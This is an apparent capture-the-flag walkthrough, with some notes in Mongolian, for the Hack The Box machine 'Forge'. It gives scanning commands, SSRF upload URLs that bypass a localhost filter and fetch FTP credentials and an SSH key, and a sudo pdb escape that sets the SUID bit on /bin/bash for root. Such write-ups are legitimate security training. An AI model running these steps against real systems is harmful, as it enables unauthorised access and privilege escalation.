1. IP Address
# Machine Address
10.10.11.111
# Local Address
10.10.14.12
2. Nmap
sudo nmap -sC -sV -oA nmap/forge 10.10.11.111
Output:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 22:18 EDT
Nmap scan report for forge.htb (10.10.11.111)
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
| 256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_ 256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Gallery
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.36 seconds
Bionic -> 4ubuntu0.3
3. Gobuster
Хэрэгтэй path байгаагүй:
/uploads (Status: 301) [Size: 224] [--> http://forge.htb/uploads/]
/upload (Status: 200) [Size: 929]
/static (Status: 301) [Size: 307] [--> http://forge.htb/static/]
/. (Status: 200) [Size: 2050]
/server-status (Status: 403) [Size: 274]
4. ffuf
ffuf -w /opt/SecLists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10
admin.forge.htb:
Only localhost is allowed!
5. URL Upload
http://forge.htb/uploads/Mx21C8lAyzi9AyygJDeW
<!DOCTYPE html>
<html>
<head>
<title>Admin Portal</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br><br>
<br><br><br><br>
<center><h1>Welcome Admins!</h1></center>
</body>
http://ADMIN.FORGE.HTB/announcements
<!DOCTYPE html>
<html>
<head>
<title>Announcements</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/main.css">
<link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br>
<ul>
<li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
<li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
<li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.</li>
</ul>
</body>
</html>
user:heightofsecurity123!
http://aDmin.forGe.hTb/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB
drwxr-xr-x 3 1000 1000 4096 Aug 04 19:23 snap
-rw-r----- 1 0 1000 33 Oct 30 18:02 user.txt
http://aDmin.forGe.hTb/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/.ssh/id_rsa
id_rsa:
-----BEGIN OPENSSH PRIVATE KEY-----
PRIVATE KEY
-----END OPENSSH PRIVATE KEY-----
User:
16eeaf74*************
6. Enumeration
sudo -l:
User user may run the following commands on forge:
(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
remote-manage.py - ашиглах боломжтой. Порт listen хийж байгаад <pdb> руу орохын тулд шинэ терминал сешн нээгээд ssh дахин нэвтрээд nc localhost <port> listen хийнэ. Эхний терминал сешн дээрээс pdb руу юу ч хамаагүй бичээд орно.
7. Exploitation
import os
os.system ('chmod u+s /bin/bash')
exit
Root руу орохдоо:
/bin/bash -p